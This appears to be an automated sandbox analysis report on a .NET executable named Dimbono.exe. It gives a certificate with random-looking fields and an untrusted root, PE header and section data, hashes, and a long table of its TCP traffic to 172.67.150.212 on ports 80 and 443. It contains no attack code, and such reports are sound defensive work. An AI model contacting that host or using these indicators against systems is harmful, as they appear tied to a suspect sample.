                                                                                    Signature Issuer:C=SoWutqXeLnMOwqJXId, S=NnUboBWoYwqDIwY, L=MbQcaOFzeHlcRYjymxStxewIKRBTmsTOLhaAui, T=TzAsjhqPvzbVTQm, E=aWqTCgKxvSbvBYMruQaKZAVvZLTXwFQbGWtnMFYTbrwiC, OU=VDEHuCSrWVaYfpynkGXgslgiPshrtkDGheEyNpkXvynJDYrAu, O=LNLPWkIrAxQDzcsXFAnPjFEWxPTohWRIy, CN=QyacKfEuUpipdGqortkydaovyOIOBGilxuiv
                                                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                    Error Number:-2146762487
                                                                                    Not Before, Not After
                                                                                    • 4/8/2021 12:06:52 AM 4/8/2022 12:06:52 AM
                                                                                    Subject Chain
                                                                                    • C=SoWutqXeLnMOwqJXId, S=NnUboBWoYwqDIwY, L=MbQcaOFzeHlcRYjymxStxewIKRBTmsTOLhaAui, T=TzAsjhqPvzbVTQm, E=aWqTCgKxvSbvBYMruQaKZAVvZLTXwFQbGWtnMFYTbrwiC, OU=VDEHuCSrWVaYfpynkGXgslgiPshrtkDGheEyNpkXvynJDYrAu, O=LNLPWkIrAxQDzcsXFAnPjFEWxPTohWRIy, CN=QyacKfEuUpipdGqortkydaovyOIOBGilxuiv
                                                                                    Version:3
                                                                                    Thumbprint MD5:02D117FF6729F8502B772DCB43B50C3A
                                                                                    Thumbprint SHA-1:AD87EC167C0EE2A6460B720995D1615054EFD17C
                                                                                    Thumbprint SHA-256:EAC36CA8694D2ABDF442E1AD9F62C45DDF61B2AF796C976F70010E21DABF7754
                                                                                    Serial:0085C0DD93B9A20656D03F3DDE5B6544CB

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    jmp dword ptr [00402000h]
                                                                                    add byte ptr [eax], al

                                                                                    Data Directories

                                                                                    Name | Virtual Address | Virtual Size | Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7d28 | 0x53 | .text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8000 | 0x598 | .rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x6800 | 0x1508 | .text
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa000 | 0xc | .reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                                    Sections

                                                                                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                                    .text | 0x2000 | 0x5d84 | 0x5e00 | False | 0.310588430851 | data | 6.24624470623 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                    .rsrc | 0x8000 | 0x598 | 0x600 | False | 0.41015625 | data | 4.03133223021 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc | 0xa000 | 0xc | 0x200 | False | 0.044921875 | data | 0.0815394123432 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    Name | RVA | Size | Type | Language | Country
                                                                                    RT_VERSION | 0x80a0 | 0x30c | data | |
                                                                                    RT_MANIFEST | 0x83ac | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                                                                    Imports

                                                                                    DLL | Import
                                                                                    mscoree.dll | _CorExeMain

                                                                                    Version Infos

                                                                                    Description | Data
                                                                                    Translation | 0x0000 0x04b0
                                                                                    LegalCopyright | Copyright 2021
                                                                                    Assembly Version | 1.0.0.0
                                                                                    InternalName | Dimbono.exe
                                                                                    FileVersion | 1.0.0.0
                                                                                    CompanyName |
                                                                                    LegalTrademarks |
                                                                                    Comments |
                                                                                    ProductName | Dimbono
                                                                                    ProductVersion | 1.0.0.0
                                                                                    FileDescription | Dimbono
                                                                                    OriginalFilename | Dimbono.exe

                                                                                    Network Behavior

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                    Apr 8, 2021 12:23:50.074418068 CEST | 49703 | 80 | 192.168.2.3 | 172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.103115082 CEST | 80 | 49703 | 172.67.150.212 | 192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.103264093 CEST | 49703 | 80 | 192.168.2.3 | 172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.103962898 CEST | 49703 | 80 | 192.168.2.3 | 172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.132519007 CEST | 80 | 49703 | 172.67.150.212 | 192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.195653915 CEST | 80 | 49703 | 172.67.150.212 | 192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.226291895 CEST | 49704 | 443 | 192.168.2.3 | 172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.254749060 CEST | 443 | 49704 | 172.67.150.212 | 192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.254941940 CEST | 49704 | 443 | 192.168.2.3 | 172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.285983086 CEST | 49704 | 443 | 192.168.2.3 | 172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.315032005 CEST | 443 | 49704 | 172.67.150.212 | 192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.318490982 CEST | 49703 | 80 | 192.168.2.3 | 172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.351553917 CEST | 443 | 49704 | 172.67.150.212 | 192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.351607084 CEST | 443 | 49704 | 172.67.150.212 | 192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.351763964 CEST | 49704 | 443 | 192.168.2.3 | 172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.359153032 CEST | 49704 | 443 | 192.168.2.3 | 172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.387747049 CEST | 443 | 49704 | 172.67.150.212 | 192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.388421059 CEST | 443 | 49704 | 172.67.150.212 | 192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.451097012 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.479623079 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662647963 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662663937 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662692070 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662703037 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662728071 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662739992 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662756920 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662767887 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662791014 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662801981 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662869930 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.662909031 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.663194895 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.663213015 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.663480043 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.663499117 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.827023029 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.827039003 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.827157974 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.827208996 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.827210903 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.827601910 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.827622890 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.827708960 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.827974081 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.828218937 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.828233004 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.828324080 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.829154015 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.829169035 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.829372883 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.829495907 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.829551935 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.829683065 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.830291033 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.830306053 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.830651999 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.830780029 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.831639051 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.831650972 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.831671000 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.831770897 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.832148075 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.832160950 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.832395077 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.832854033 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.832868099 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.832951069 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.833547115 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.833559990 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.833734035 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.834213018 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.834225893 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.834347963 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.835005999 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.835035086 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.835417032 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.835597992 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.835613012 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.835979939 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.836270094 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.836349010 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.836896896 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.836910963 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.837260962 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.837270975 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.837651968 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.837676048 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.838177919 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.838206053 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.838280916 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.838500977 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.838963032 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.855664968 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.855694056 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.855797052 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.855849981 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.855865002 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.856442928 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.856614113 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.856654882 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.857201099 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.857217073 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.857323885 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.857335091 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.857865095 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.857883930 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.858735085 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.858747005 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.859267950 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.859285116 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.859564066 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.859582901 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.859586000 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.859863997 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.859885931 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.860078096 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.860590935 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.860644102 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.860749006 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.861264944 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.861407042 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.861639023 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.861656904 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.861959934 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.862247944 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.862273932 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.862973928 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.863073111 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.863204956 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.863219976 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.863586903 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.863600969 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.863701105 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.864243031 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.864381075 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.865186930 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.865209103 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.865699053 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.865715981 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.865822077 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.865842104 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.865850925 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.866300106 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.866317034 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.866528034 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.866925001 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.866969109 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.867186069 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.867615938 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.867633104 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.868231058 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.868246078 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.868952990 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.868998051 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.869590998 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.869613886 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.869622946 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.869841099 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.870212078 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.870230913 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.871404886 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.884521961 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.884548903 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.884562016 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.884716988 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.884934902 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.884951115 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.884968996 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.885078907 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.885858059 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.885874033 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.885893106 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.887949944 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.887963057 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.888040066 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.888057947 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.888197899 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.888261080 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.888273001 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.888951063 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.888964891 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.888982058 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.889590979 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.889609098 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.889611006 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.889779091 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.889839888 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.889857054 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.889986038 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.889997959 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.890491962 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.891655922 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.891679049 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.891697884 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.891920090 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.891933918 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.891963959 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.892019987 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.892034054 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.956995010 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.957036018 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.957071066 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.957154989 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.957165003 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.957685947 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.957719088 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.957732916 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.957753897 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.957773924 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.957787037 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.958837032 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.958853006 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.958873034 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.958884001 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.958895922 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.958937883 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.958957911 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.958961010 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.959362030 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.959378004 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.959398985 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.959410906 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.959427118 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.959445000 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.959455013 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.959470987 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.959702969 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.960218906 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.960233927 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.960253000 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.960264921 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.960284948 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.960355043 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.960366011 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.960367918 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.961102962 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.961117983 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.961153984 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.961167097 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.961183071 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.961194992 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.961256027 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.961272955 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.961276054 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.961992025 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.962007046 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.962023020 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.962048054 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.962060928 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.962080002 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.962769032 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.962829113 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.962872982 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.962884903 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.962904930 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.962918043 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.962956905 CEST49704443192.168.2.3172.67.150.212
